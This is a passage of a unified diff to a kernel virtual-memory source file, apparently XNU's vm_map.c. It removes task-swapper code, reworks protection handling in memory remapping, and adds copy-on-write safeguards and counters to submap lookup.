*/ - zcram(vm_map_zone, map_data, map_data_size); - zcram(vm_map_entry_reserved_zone, kentry_data, kentry_data_size); - zcram(vm_map_holes_zone, map_holes_data, map_holes_data_size); + zone_cram_foreign(vm_map_zone, map_data, map_data_size); + zone_cram_foreign(vm_map_entry_reserved_zone, kentry_data, kentry_data_size); + zone_cram_foreign(vm_map_holes_zone, map_holes_data, map_holes_data_size); /* * Since these are covered by zones, remove them from stolen page accounting. @@ -1135,6 +1144,7 @@ static void vm_map_steal_memory(void) { uint16_t kentry_initial_pages; + uint16_t zone_foreign_pages; map_data_size = zone_get_foreign_alloc_size(VM_MAP_ZONE_NAME, sizeof(struct _vm_map), VM_MAP_ZFLAGS, 1); @@ -1145,8 +1155,8 @@ vm_map_steal_memory(void) * scheme is activated and/or entries are available from the general * map entry pool. */ -#if defined(__LP64__) - kentry_initial_pages = 10; +#if defined(__LP64__) + kentry_initial_pages = (uint16_t)atop(16 * 4096); #else kentry_initial_pages = 6; #endif @@ -1159,6 +1169,10 @@ vm_map_steal_memory(void) kentry_initial_pages *= 1024; } #endif + if (PE_parse_boot_argn("zone_foreign_pages", &zone_foreign_pages, + sizeof(zone_foreign_pages))) { + kentry_initial_pages = zone_foreign_pages; + } kentry_data_size = zone_get_foreign_alloc_size(VME_RESERVED_ZONE_NAME, sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS, @@ -1189,12 +1203,12 @@ boolean_t vm_map_supports_hole_optimization = FALSE; void vm_kernel_reserved_entry_init(void) { - zone_prio_refill_configure(vm_map_entry_reserved_zone); + zone_replenish_configure(vm_map_entry_reserved_zone); /* * Once we have our replenish thread set up, we can start using the vm_map_holes zone. 
*/ - zone_prio_refill_configure(vm_map_holes_zone); + zone_replenish_configure(vm_map_holes_zone); vm_map_supports_hole_optimization = TRUE; } @@ -1298,10 +1312,6 @@ vm_map_create_options( result->vmmap_high_start = 0; #endif os_ref_init_count(&result->map_refcnt, &map_refgrp, 1); -#if TASK_SWAPPER - result->res_count = 1; - result->sw_state = MAP_SW_IN; -#endif /* TASK_SWAPPER */ result->pmap = pmap; result->min_offset = min; result->max_offset = max; @@ -1322,6 +1332,7 @@ vm_map_create_options( result->jit_entry_exists = FALSE; result->is_alien = FALSE; result->reserved_regions = FALSE; + result->single_jit = FALSE; /* "has_corpse_footprint" and "holelistenabled" are mutually exclusive */ if (options & VM_MAP_CREATE_CORPSE_FOOTPRINT) { @@ -1508,79 +1519,6 @@ first_free_is_valid( #define vm_map_copy_entry_unlink(copy, entry) \ _vm_map_store_entry_unlink(&(copy)->cpy_hdr, (entry)) -#if MACH_ASSERT && TASK_SWAPPER -/* - * vm_map_res_reference: - * - * Adds another valid residence count to the given map. - * - * Map is locked so this function can be called from - * vm_map_swapin. - * - */ -void -vm_map_res_reference(vm_map_t map) -{ - /* assert map is locked */ - assert(map->res_count >= 0); - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); - if (map->res_count == 0) { - lck_mtx_unlock(&map->s_lock); - vm_map_lock(map); - vm_map_swapin(map); - lck_mtx_lock(&map->s_lock); - ++map->res_count; - vm_map_unlock(map); - } else { - ++map->res_count; - } -} - -/* - * vm_map_reference_swap: - * - * Adds valid reference and residence counts to the given map. - * - * The map may not be in memory (i.e. zero residence count). 
- * - */ -void -vm_map_reference_swap(vm_map_t map) -{ - assert(map != VM_MAP_NULL); - lck_mtx_lock(&map->s_lock); - assert(map->res_count >= 0); - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); - os_ref_retain_locked(&map->map_refcnt); - vm_map_res_reference(map); - lck_mtx_unlock(&map->s_lock); -} - -/* - * vm_map_res_deallocate: - * - * Decrement residence count on a map; possibly causing swapout. - * - * The map must be in memory (i.e. non-zero residence count). - * - * The map is locked, so this function is callable from vm_map_deallocate. - * - */ -void -vm_map_res_deallocate(vm_map_t map) -{ - assert(map->res_count > 0); - if (--map->res_count == 0) { - lck_mtx_unlock(&map->s_lock); - vm_map_lock(map); - vm_map_swapout(map); - vm_map_unlock(map); - lck_mtx_lock(&map->s_lock); - } - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); -} -#endif /* MACH_ASSERT && TASK_SWAPPER */ - /* * vm_map_destroy: * @@ -1678,193 +1616,6 @@ find_largest_process_vm_map_entries(void) return victim_pid; } -#if TASK_SWAPPER -/* - * vm_map_swapin/vm_map_swapout - * - * Swap a map in and out, either referencing or releasing its resources. - * These functions are internal use only; however, they must be exported - * because they may be called from macros, which are exported. - * - * In the case of swapout, there could be races on the residence count, - * so if the residence count is up, we return, assuming that a - * vm_map_deallocate() call in the near future will bring us back. - * - * Locking: - * -- We use the map write lock for synchronization among races. - * -- The map write lock, and not the simple s_lock, protects the - * swap state of the map. - * -- If a map entry is a share map, then we hold both locks, in - * hierarchical order. - * - * Synchronization Notes: - * 1) If a vm_map_swapin() call happens while swapout in progress, it - * will block on the map lock and proceed when swapout is through. 
- * 2) A vm_map_reference() call at this time is illegal, and will - * cause a panic. vm_map_reference() is only allowed on resident - * maps, since it refuses to block. - * 3) A vm_map_swapin() call during a swapin will block, and - * proceeed when the first swapin is done, turning into a nop. - * This is the reason the res_count is not incremented until - * after the swapin is complete. - * 4) There is a timing hole after the checks of the res_count, before - * the map lock is taken, during which a swapin may get the lock - * before a swapout about to happen. If this happens, the swapin - * will detect the state and increment the reference count, causing - * the swapout to be a nop, thereby delaying it until a later - * vm_map_deallocate. If the swapout gets the lock first, then - * the swapin will simply block until the swapout is done, and - * then proceed. - * - * Because vm_map_swapin() is potentially an expensive operation, it - * should be used with caution. - * - * Invariants: - * 1) A map with a residence count of zero is either swapped, or - * being swapped. - * 2) A map with a non-zero residence count is either resident, - * or being swapped in. - */ - -int vm_map_swap_enable = 1; - -void -vm_map_swapin(vm_map_t map) -{ - vm_map_entry_t entry; - - if (!vm_map_swap_enable) { /* debug */ - return; - } - - /* - * Map is locked - * First deal with various races. - */ - if (map->sw_state == MAP_SW_IN) { - /* - * we raced with swapout and won. Returning will incr. - * the res_count, turning the swapout into a nop. - */ - return; - } - - /* - * The residence count must be zero. If we raced with another - * swapin, the state would have been IN; if we raced with a - * swapout (after another competing swapin), we must have lost - * the race to get here (see above comment), in which case - * res_count is still 0. 
- */ - assert(map->res_count == 0); - - /* - * There are no intermediate states of a map going out or - * coming in, since the map is locked during the transition. - */ - assert(map->sw_state == MAP_SW_OUT); - - /* - * We now operate upon each map entry. If the entry is a sub- - * or share-map, we call vm_map_res_reference upon it. - * If the entry is an object, we call vm_object_res_reference - * (this may iterate through the shadow chain). - * Note that we hold the map locked the entire time, - * even if we get back here via a recursive call in - * vm_map_res_reference. - */ - entry = vm_map_first_entry(map); - - while (entry != vm_map_to_entry(map)) { - if (VME_OBJECT(entry) != VM_OBJECT_NULL) { - if (entry->is_sub_map) { - vm_map_t lmap = VME_SUBMAP(entry); - lck_mtx_lock(&lmap->s_lock); - vm_map_res_reference(lmap); - lck_mtx_unlock(&lmap->s_lock); - } else { - vm_object_t object = VME_OBEJCT(entry); - vm_object_lock(object); - /* - * This call may iterate through the - * shadow chain. - */ - vm_object_res_reference(object); - vm_object_unlock(object); - } - } - entry = entry->vme_next; - } - assert(map->sw_state == MAP_SW_OUT); - map->sw_state = MAP_SW_IN; -} - -void -vm_map_swapout(vm_map_t map) -{ - vm_map_entry_t entry; - - /* - * Map is locked - * First deal with various races. - * If we raced with a swapin and lost, the residence count - * will have been incremented to 1, and we simply return. - */ - lck_mtx_lock(&map->s_lock); - if (map->res_count != 0) { - lck_mtx_unlock(&map->s_lock); - return; - } - lck_mtx_unlock(&map->s_lock); - - /* - * There are no intermediate states of a map going out or - * coming in, since the map is locked during the transition. - */ - assert(map->sw_state == MAP_SW_IN); - - if (!vm_map_swap_enable) { - return; - } - - /* - * We now operate upon each map entry. If the entry is a sub- - * or share-map, we call vm_map_res_deallocate upon it. 
- * If the entry is an object, we call vm_object_res_deallocate - * (this may iterate through the shadow chain). - * Note that we hold the map locked the entire time, - * even if we get back here via a recursive call in - * vm_map_res_deallocate. - */ - entry = vm_map_first_entry(map); - - while (entry != vm_map_to_entry(map)) { - if (VME_OBJECT(entry) != VM_OBJECT_NULL) { - if (entry->is_sub_map) { - vm_map_t lmap = VME_SUBMAP(entry); - lck_mtx_lock(&lmap->s_lock); - vm_map_res_deallocate(lmap); - lck_mtx_unlock(&lmap->s_lock); - } else { - vm_object_t object = VME_OBJECT(entry); - vm_object_lock(object); - /* - * This call may take a long time, - * since it could actively push - * out pages (if we implement it - * that way). - */ - vm_object_res_deallocate(object); - vm_object_unlock(object); - } - } - entry = entry->vme_next; - } - assert(map->sw_state == MAP_SW_IN); - map->sw_state = MAP_SW_OUT; -} - -#endif /* TASK_SWAPPER */ /* * vm_map_lookup_entry: [ internal use only ] @@ -2321,7 +2072,12 @@ vm_map_random_address_for_size( assert(VM_MAP_PAGE_ALIGNED(size, VM_MAP_PAGE_MASK(map))); while (tries < MAX_TRIES_TO_GET_RANDOM_ADDRESS) { - random_addr = ((vm_map_offset_t)random()) << VM_MAP_PAGE_SHIFT(map); + if (startup_phase < STARTUP_SUB_ZALLOC) { + random_addr = (vm_map_offset_t)early_random(); + } else { + random_addr = (vm_map_offset_t)random(); + } + random_addr <<= VM_MAP_PAGE_SHIFT(map); random_addr = vm_map_trunc_page( vm_map_min(map) + (random_addr % addr_space_size), VM_MAP_PAGE_MASK(map)); @@ -2415,7 +2171,7 @@ vm_map_enter( boolean_t overwrite = ((flags & VM_FLAGS_OVERWRITE) != 0); boolean_t no_cache = ((flags & VM_FLAGS_NO_CACHE) != 0); boolean_t is_submap = vmk_flags.vmkf_submap; - boolean_t permanent = vmk_flags.vmkf_permanent; + boolean_t permanent = (((flags & VM_FLAGS_PERMANENT) != 0) || vmk_flags.vmkf_permanent); boolean_t no_copy_on_read = vmk_flags.vmkf_no_copy_on_read; boolean_t entry_for_jit = vmk_flags.vmkf_map_jit; boolean_t iokit_acct = 
vmk_flags.vmkf_iokit_acct; @@ -4649,7 +4405,9 @@ vm_map_enter_mem_object_helper( (vm_tag_t) copy_vm_alias, /* see comment at end of vm_fault_unwire re. cast*/ copy_object, copy_offset, - ((copy_object == NULL) ? FALSE : copy), + ((copy_object == NULL) + ? FALSE + : (copy || copy_entry->needs_copy)), cur_protection, max_protection, inheritance); @@ -5138,7 +4896,6 @@ vm_map_enter_mem_object_control( vm_object_lock(object); object->ref_count++; - vm_object_res_reference(object); /* * For "named" VM objects, let the pager know that the @@ -6082,6 +5839,7 @@ vm_map_protect( * only. */ max_prot = new_prot & VM_PROT_ALL; + cur_prot = VM_PROT_NONE; kflags = VM_MAP_KERNEL_FLAGS_NONE; kflags.vmkf_remap_prot_copy = TRUE; kflags.vmkf_overwrite_immutable = TRUE; @@ -6089,15 +5847,15 @@ vm_map_protect( kr = vm_map_remap(map, &new_start, end - start, - 0, /* mask */ + 0, /* mask */ VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, kflags, 0, map, start, - TRUE, /* copy-on-write remapping! */ - &cur_prot, - &max_prot, + TRUE, /* copy-on-write remapping! */ + &cur_prot, /* IN/OUT */ + &max_prot, /* IN/OUT */ VM_INHERIT_DEFAULT); if (kr != KERN_SUCCESS) { return kr; @@ -12424,16 +12182,16 @@ vm_map_copy_extract( vm_map_t src_map, vm_map_address_t src_addr, vm_map_size_t len, - vm_prot_t required_prot, boolean_t do_copy, vm_map_copy_t *copy_result, /* OUT */ - vm_prot_t *cur_prot, /* OUT */ - vm_prot_t *max_prot, /* OUT */ + vm_prot_t *cur_prot, /* IN/OUT */ + vm_prot_t *max_prot, /* IN/OUT */ vm_inherit_t inheritance, vm_map_kernel_flags_t vmk_flags) { vm_map_copy_t copy; kern_return_t kr; + vm_prot_t required_cur_prot, required_max_prot; /* * Check for copies of zero bytes. @@ -12455,6 +12213,9 @@ vm_map_copy_extract( DEBUG4K_SHARE("src_map %p src_addr 0x%llx src_end 0x%llx\n", src_map, (uint64_t)src_addr, (uint64_t)(src_addr + len)); } + required_cur_prot = *cur_prot; + required_max_prot = *max_prot; + /* * Allocate a header element for the list. 
* @@ -12474,19 +12235,20 @@ vm_map_copy_extract( kr = vm_map_remap_extract(src_map, src_addr, len, - required_prot, - do_copy, /* copy */ + do_copy, /* copy */ ©->cpy_hdr, - cur_prot, - max_prot, + cur_prot, /* IN/OUT */ + max_prot, /* IN/OUT */ inheritance, vmk_flags); if (kr != KERN_SUCCESS) { vm_map_copy_discard(copy); return kr; } - assert((*cur_prot & required_prot) == required_prot); - assert((*max_prot & required_prot) == required_prot); + if (required_cur_prot != VM_PROT_NONE) { + assert((*cur_prot & required_cur_prot) == required_cur_prot); + assert((*max_prot & required_max_prot) == required_max_prot); + } *copy_result = copy; return KERN_SUCCESS; @@ -12921,7 +12683,7 @@ vm_map_fork( #endif /* PMAP_CREATE_FORCE_4K_PAGES */ new_pmap = pmap_create_options(ledger, (vm_map_size_t) 0, pmap_flags); - vm_map_reference_swap(old_map); + vm_map_reference(old_map); vm_map_lock(old_map); map_create_options = 0; @@ -13209,6 +12971,19 @@ vm_map_exec( return KERN_SUCCESS; } +uint64_t vm_map_lookup_locked_copy_slowly_count = 0; +uint64_t vm_map_lookup_locked_copy_slowly_size = 0; +uint64_t vm_map_lookup_locked_copy_slowly_max = 0; +uint64_t vm_map_lookup_locked_copy_slowly_restart = 0; +uint64_t vm_map_lookup_locked_copy_slowly_error = 0; +uint64_t vm_map_lookup_locked_copy_strategically_count = 0; +uint64_t vm_map_lookup_locked_copy_strategically_size = 0; +uint64_t vm_map_lookup_locked_copy_strategically_max = 0; +uint64_t vm_map_lookup_locked_copy_strategically_restart = 0; +uint64_t vm_map_lookup_locked_copy_strategically_error = 0; +uint64_t vm_map_lookup_locked_copy_shadow_count = 0; +uint64_t vm_map_lookup_locked_copy_shadow_size = 0; +uint64_t vm_map_lookup_locked_copy_shadow_max = 0; /* * vm_map_lookup_locked: * @@ -13262,6 +13037,7 @@ vm_map_lookup_locked( boolean_t mask_protections; boolean_t force_copy; boolean_t no_force_copy_if_executable; + boolean_t submap_needed_copy; vm_prot_t original_fault_type; vm_map_size_t fault_page_mask; @@ -13324,6 +13100,7 @@ 
RetryLookup: * returned locked. */ + submap_needed_copy = FALSE; submap_recurse: if (entry->is_sub_map) { vm_map_offset_t local_vaddr; @@ -13384,6 +13161,9 @@ submap_recurse: } } } else { + if (entry->needs_copy) { + submap_needed_copy = TRUE; + } vm_map_lock_read(VME_SUBMAP(entry)); *var_map = VME_SUBMAP(entry); /* leave map locked if it is a target */ @@ -13453,8 +13233,9 @@ RetrySubMap: vm_object_offset_t copy_offset; vm_map_offset_t local_start; vm_map_offset_t local_end; - boolean_t copied_slowly = FALSE; - vm_object_offset_t copied_slowly_phys_offset = 0; + boolean_t object_copied = FALSE; + vm_object_offset_t object_copied_offset = 0; + boolean_t object_copied_needs_copy = FALSE; kern_return_t kr = KERN_SUCCESS; if (vm_map_lock_read_to_write(map)) { @@ -13492,38 +13273,38 @@ RetrySubMap: /* an entry in our space to the underlying */ /* object in the submap, bypassing the */ /* submap. */ - - if (submap_entry->wired_count != 0 || - (sub_object->copy_strategy != - MEMORY_OBJECT_COPY_SYMMETRIC)) { - if ((submap_entry->protection & VM_PROT_EXECUTE) && - no_force_copy_if_executable) { -// printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy); - if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) { - vm_map_unlock(cow_sub_map_parent); - } - if ((*real_map != map) - && (*real_map != cow_sub_map_parent)) { - vm_map_unlock(*real_map); - } - *real_map = map; - vm_map_lock_write_to_read(map); - kr = KERN_PROTECTION_FAILURE; - DTRACE_VM4(submap_no_copy_executable, - vm_map_t, map, - vm_object_offset_t, submap_entry_offset, - vm_object_size_t, submap_entry_size, - int, kr); - return kr; + submap_entry_offset = VME_OFFSET(submap_entry); + submap_entry_size = submap_entry->vme_end - submap_entry->vme_start; + + if ((submap_entry->wired_count != 0 || + sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) && + 
(submap_entry->protection & VM_PROT_EXECUTE) && + no_force_copy_if_executable) { +// printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy); + if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) { + vm_map_unlock(cow_sub_map_parent); + } + if ((*real_map != map) + && (*real_map != cow_sub_map_parent)) { + vm_map_unlock(*real_map); } + *real_map = map; + vm_map_lock_write_to_read(map); + kr = KERN_PROTECTION_FAILURE; + DTRACE_VM4(submap_no_copy_executable, + vm_map_t, map, + vm_object_offset_t, submap_entry_offset, + vm_object_size_t, submap_entry_size, + int, kr); + return kr; + } + if (submap_entry->wired_count != 0) { vm_object_reference(sub_object); assertf(VM_MAP_PAGE_ALIGNED(VME_OFFSET(submap_entry), VM_MAP_PAGE_MASK(map)), "submap_entry %p offset 0x%llx\n", submap_entry, VME_OFFSET(submap_entry)); - submap_entry_offset = VME_OFFSET(submap_entry); - submap_entry_size = submap_entry->vme_end - submap_entry->vme_start; DTRACE_VM6(submap_copy_slowly, vm_map_t, cow_sub_map_parent, @@ -13544,9 +13325,11 @@ RetrySubMap: submap_entry_size, FALSE, ©_object); - copied_slowly = TRUE; + object_copied = TRUE; + object_copied_offset = 0; /* 4k: account for extra offset in physical page */ - copied_slowly_phys_offset = submap_entry_offset - vm_object_trunc_page(submap_entry_offset); + object_copied_offset += submap_entry_offset - vm_object_trunc_page(submap_entry_offset); + object_copied_needs_copy = FALSE; vm_object_deallocate(sub_object); vm_map_lock(map); @@ -13564,11 +13347,12 @@ RetrySubMap: vm_object_deallocate(copy_object); copy_object = VM_OBJECT_NULL; vm_map_lock_write_to_read(map); - DTRACE_VM4(submap_copy_slowly, + DTRACE_VM4(submap_copy_error_slowly, vm_object_t, sub_object, vm_object_offset_t, submap_entry_offset, vm_object_size_t, submap_entry_size, int, kr); + vm_map_lookup_locked_copy_slowly_error++; return kr; } @@ 
-13582,10 +13366,73 @@ RetrySubMap: vm_object_deallocate(copy_object); copy_object = VM_OBJECT_NULL; vm_map_lock_write_to_read(map); + vm_map_lookup_locked_copy_slowly_restart++; + goto RetrySubMap; + } + vm_map_lookup_locked_copy_slowly_count++; + vm_map_lookup_locked_copy_slowly_size += submap_entry_size; + if (submap_entry_size > vm_map_lookup_locked_copy_slowly_max) { + vm_map_lookup_locked_copy_slowly_max = submap_entry_size; + } + } else if (sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) { + submap_entry_offset = VME_OFFSET(submap_entry); + copy_object = VM_OBJECT_NULL; + object_copied_offset = submap_entry_offset; + object_copied_needs_copy = FALSE; + DTRACE_VM6(submap_copy_strategically, + vm_map_t, cow_sub_map_parent, + vm_map_offset_t, vaddr, + vm_map_t, map, + vm_object_size_t, submap_entry_size, + int, submap_entry->wired_count, + int, sub_object->copy_strategy); + kr = vm_object_copy_strategically( + sub_object, + submap_entry_offset, + submap_entry->vme_end - submap_entry->vme_start, + ©_object, + &object_copied_offset, + &object_copied_needs_copy); + if (kr == KERN_MEMORY_RESTART_COPY) { + old_start -= start_delta; + old_end += end_delta; + vm_object_deallocate(copy_object); + copy_object = VM_OBJECT_NULL; + vm_map_lock_write_to_read(map); + vm_map_lookup_locked_copy_strategically_restart++; goto RetrySubMap; } + if (kr != KERN_SUCCESS) { + if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) { + vm_map_unlock(cow_sub_map_parent); + } + if ((*real_map != map) + && (*real_map != cow_sub_map_parent)) { + vm_map_unlock(*real_map); + } + *real_map = map; + vm_object_deallocate(copy_object); + copy_object = VM_OBJECT_NULL; + vm_map_lock_write_to_read(map); + DTRACE_VM4(submap_copy_error_strategically, + vm_object_t, sub_object, + vm_object_offset_t, submap_entry_offset, + vm_object_size_t, submap_entry_size, + int, kr); + vm_map_lookup_locked_copy_strategically_error++; + return kr; + } + assert(copy_object != VM_OBJECT_NULL); + 
assert(copy_object != sub_object); + object_copied = TRUE; + vm_map_lookup_locked_copy_strategically_count++; + vm_map_lookup_locked_copy_strategically_size += submap_entry_size; + if (submap_entry_size > vm_map_lookup_locked_copy_strategically_max) { + vm_map_lookup_locked_copy_strategically_max = submap_entry_size; + } } else { /* set up shadow object */ + object_copied = FALSE; copy_object = sub_object; vm_object_lock(sub_object); vm_object_reference_locked(sub_object); @@ -13617,6 +13464,11 @@ RetrySubMap: VM_MAP_PAGE_SIZE(map), submap_entry->vme_start, prot); + vm_map_lookup_locked_copy_shadow_count++; + vm_map_lookup_locked_copy_shadow_size += submap_entry_size; + if (submap_entry_size > vm_map_lookup_locked_copy_shadow_max) { + vm_map_lookup_locked_copy_shadow_max = submap_entry_size; + } } /* @@ -13664,7 +13516,7 @@ RetrySubMap: uint64_t, (uint64_t)entry->vme_start, uint64_t, (uint64_t)entry->vme_end, vm_map_offset_t, vaddr, - int, copied_slowly); + int, object_copied); return KERN_INVALID_ADDRESS; } @@ -13754,17 +13606,16 @@ RetrySubMap: entry->protection &= ~VM_PROT_EXECUTE; } - if (copied_slowly) { - VME_OFFSET_SET(entry, local_start - old_start + copied_slowly_phys_offset); - entry->needs_copy = FALSE; + if (object_copied) { + VME_OFFSET_SET(entry, local_start - old_start + object_copied_offset); + entry->needs_copy = object_copied_needs_copy; entry->is_shared = FALSE; } else { - VME_OFFSET_SET(entry, copy_offset); + assert(VME_OBJECT(entry) != VM_OBJECT_NULL); + assert(VME_OBJECT(entry)->copy_strategy == MEMORY_OBJECT_COPY_SYMMETRIC); assert(entry->wired_count == 0); + VME_OFFSET_SET(entry, copy_offset); entry->needs_copy = TRUE; - if (entry->inheritance == VM_INHERIT_SHARE) { - entry->inheritance = VM_INHERIT_COPY; - } if (map != old_map) { entry->is_shared = TRUE; } @@ -13883,6 +13734,19 @@ protection_failure: } } + if (submap_needed_copy && (prot & VM_PROT_WRITE)) { + /* + * We went through a "needs_copy" submap without triggering + * a copy, so 
granting write access to the page would bypass + * that submap's "needs_copy". + */ + assert(!(fault_type & VM_PROT_WRITE)); + assert(!*wired); + assert(!force_copy); + // printf("FBDP %d[%s] submap_needed_copy for %p 0x%llx\n", proc_selfpid(), proc_name_address(current_task()->bsd_info), map, vaddr); + prot &= ~VM_PROT_WRITE; + } + /* * Create an object if necessary. */ @@ -14065,6 +13929,7 @@ vm_map_region_recurse_64( vm_region_submap_short_info_64_t short_info; boolean_t do_region_footprint; int effective_page_size, effective_page_shift; + boolean_t submap_needed_copy; if (map == VM_MAP_NULL) { /* no address space to work on */ @@ -14105,6 +13970,7 @@ vm_map_region_recurse_64( user_address = *address; user_max_depth = *nesting_depth; + submap_needed_copy = FALSE; if (not_in_kdp) { vm_map_lock_read(map); @@ -14241,6 +14107,11 @@ recurse_again: * Get down to the next submap level. */ + if (curr_entry->needs_copy) { + /* everything below this is effectively copy-on-write */ + submap_needed_copy = TRUE; + } + /* * Lock the next level and unlock the current level, * unless we need to keep it locked to access the "next_entry" @@ -14318,6 +14189,9 @@ recurse_again: submap_info->shadow_depth = 0; submap_info->external_pager = 0; submap_info->share_mode = SM_PRIVATE; + if (submap_needed_copy) { + submap_info->share_mode = SM_COW; + } submap_info->is_submap = 0; submap_info->behavior = VM_BEHAVIOR_DEFAULT; submap_info->object_id = VM_OBJECT_ID_FAKE(map, task_ledgers.purgeable_nonvolatile); @@ -14336,6 +14210,9 @@ recurse_again: short_info->external_pager = 0; short_info->shadow_depth = 0; short_info->share_mode = SM_PRIVATE; + if (submap_needed_copy) { + short_info->share_mode = SM_COW; + } short_info->ref_count = 1; } *nesting_depth = 0; @@ -14444,6 +14321,9 @@ recurse_again: extended.share_mode == SM_SHARED) { extended.share_mode = SM_PRIVATE; } + if (submap_needed_copy) { + extended.share_mode = SM_COW; + } } else { if (curr_entry->use_pmap) { extended.share_mode = 
SM_TRUESHARED; @@ -15160,8 +15040,6 @@ vm_map_simplify_entry( { vm_map_entry_t prev_entry; - counter(c_vm_map_simplify_entry_called++); - prev_entry = this_entry->vme_prev; if ((this_entry != vm_map_to_entry(map)) && @@ -15228,7 +15106,6 @@ vm_map_simplify_entry( } vm_map_entry_dispose(map, prev_entry); SAVE_HINT_MAP_WRITE(map, this_entry); - counter(c_vm_map_simplified++); } } @@ -15244,7 +15121,6 @@ vm_map_simplify( vm_map_simplify_entry(map, this_entry); vm_map_simplify_entry(map, this_entry->vme_next); } - counter(c_vm_map_simplify_called++); vm_map_unlock(map); } @@ -15807,8 +15683,6 @@ vm_map_entry_is_reusable( object->shadow == VM_OBJECT_NULL && object->internal && object->purgable == VM_PURGABLE_DENY && - object->copy_strategy != MEMORY_OBJECT_COPY_DELAY && - !object->true_share && object->wimg_bits == VM_WIMG_USE_DEFAULT && !object->code_signed) { return TRUE; @@ -16332,8 +16206,6 @@ vm_map_entry_insert( return new_entry; } -int vm_remap_old_path = 0; -int vm_remap_new_path = 0; /* * Routine: vm_map_remap_extract * @@ -16344,11 +16216,10 @@ vm_map_remap_extract( vm_map_t map, vm_map_offset_t addr, vm_map_size_t size, - vm_prot_t required_protection, boolean_t copy, struct vm_map_header *map_header, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ /* What, no behavior? 
*/ vm_inherit_t inheritance, vm_map_kernel_flags_t vmk_flags) @@ -16371,6 +16242,8 @@ vm_map_remap_extract( vm_prot_t max_prot_for_prot_copy; vm_map_offset_t effective_page_mask; boolean_t pageable, same_map; + boolean_t vm_remap_legacy; + vm_prot_t required_cur_prot, required_max_prot; pageable = vmk_flags.vmkf_copy_pageable; same_map = vmk_flags.vmkf_copy_same_map; @@ -16383,7 +16256,9 @@ vm_map_remap_extract( assert(inheritance == VM_INHERIT_NONE || inheritance == VM_INHERIT_COPY || inheritance == VM_INHERIT_SHARE); - assert(!(required_protection & ~VM_PROT_ALL)); + assert(!(*cur_protection & ~VM_PROT_ALL)); + assert(!(*max_protection & ~VM_PROT_ALL)); + assert((*cur_protection & *max_protection) == *cur_protection); /* * Compute start and end of region. @@ -16405,12 +16280,52 @@ vm_map_remap_extract( vm_map_store_init( map_header ); if (copy && vmk_flags.vmkf_remap_prot_copy) { + /* + * Special case for vm_map_protect(VM_PROT_COPY): + * we want to set the new mappings' max protection to the + * specified *max_protection... + */ max_prot_for_prot_copy = *max_protection & VM_PROT_ALL; + /* ... but we want to use the vm_remap() legacy mode */ + *max_protection = VM_PROT_NONE; + *cur_protection = VM_PROT_NONE; } else { max_prot_for_prot_copy = VM_PROT_NONE; } - *cur_protection = VM_PROT_ALL; - *max_protection = VM_PROT_ALL; + + if (*cur_protection == VM_PROT_NONE && + *max_protection == VM_PROT_NONE) { + /* + * vm_remap() legacy mode: + * Extract all memory regions in the specified range and + * collect the strictest set of protections allowed on the + * entire range, so the caller knows what they can do with + * the remapped range. + * We start with VM_PROT_ALL and we'll remove the protections + * missing from each memory region. 
+ */ + vm_remap_legacy = TRUE; + *cur_protection = VM_PROT_ALL; + *max_protection = VM_PROT_ALL; + required_cur_prot = VM_PROT_NONE; + required_max_prot = VM_PROT_NONE; + } else { + /* + * vm_remap_new() mode: + * Extract all memory regions in the specified range and + * ensure that they have at least the protections specified + * by the caller via *cur_protection and *max_protection. + * The resulting mapping should have these protections. + */ + vm_remap_legacy = FALSE; + if (copy) { + required_cur_prot = VM_PROT_NONE; + required_max_prot = VM_PROT_READ; + } else { + required_cur_prot = *cur_protection; + required_max_prot = *max_protection; + } + } map_address = 0; mapped_size = 0; @@ -16460,9 +16375,10 @@ vm_map_remap_extract( vm_map_t submap; vm_map_offset_t submap_start; vm_map_size_t submap_size; + boolean_t submap_needs_copy; /* - * No check for "required_protection" on "src_entry" + * No check for "required protection" on "src_entry" * because the protections that matter are the ones * on the submap's VM map entry, which will be checked * during the call to vm_map_remap_extract() below. @@ -16473,14 +16389,57 @@ vm_map_remap_extract( } submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start; submap = VME_SUBMAP(src_entry); + if (copy) { + /* + * The caller wants a copy-on-write re-mapping, + * so let's extract from the submap accordingly. + */ + submap_needs_copy = TRUE; + } else if (src_entry->needs_copy) { + /* + * The caller wants a shared re-mapping but the + * submap is mapped with "needs_copy", so its + * contents can't be shared as is. Extract the + * contents of the submap as "copy-on-write". + * The re-mapping won't be shared with the + * original mapping but this is equivalent to + * what happened with the original "remap from + * submap" code. + * The shared region is mapped "needs_copy", for + * example. 
+ */ + submap_needs_copy = TRUE; + } else { + /* + * The caller wants a shared re-mapping and + * this mapping can be shared (no "needs_copy"), + * so let's extract from the submap accordingly. + * Kernel submaps are mapped without + * "needs_copy", for example. + */ + submap_needs_copy = FALSE; + } vm_map_reference(submap); vm_map_unlock(map); src_entry = NULL; + if (vm_remap_legacy) { + *cur_protection = VM_PROT_NONE; + *max_protection = VM_PROT_NONE; + } + + DTRACE_VM7(remap_submap_recurse, + vm_map_t, map, + vm_map_offset_t, addr, + vm_map_size_t, size, + boolean_t, copy, + vm_map_offset_t, submap_start, + vm_map_size_t, submap_size, + boolean_t, submap_needs_copy); + result = vm_map_remap_extract(submap, submap_start, submap_size, - required_protection, - copy, + submap_needs_copy, map_header, cur_protection, max_protection, @@ -16490,8 +16449,12 @@ vm_map_remap_extract( return result; } - if ((src_entry->protection & required_protection) - != required_protection) { + if (src_entry->is_sub_map) { + /* protections for submap mapping are irrelevant here */ + } else if (((src_entry->protection & required_cur_prot) != + required_cur_prot) || + ((src_entry->max_protection & 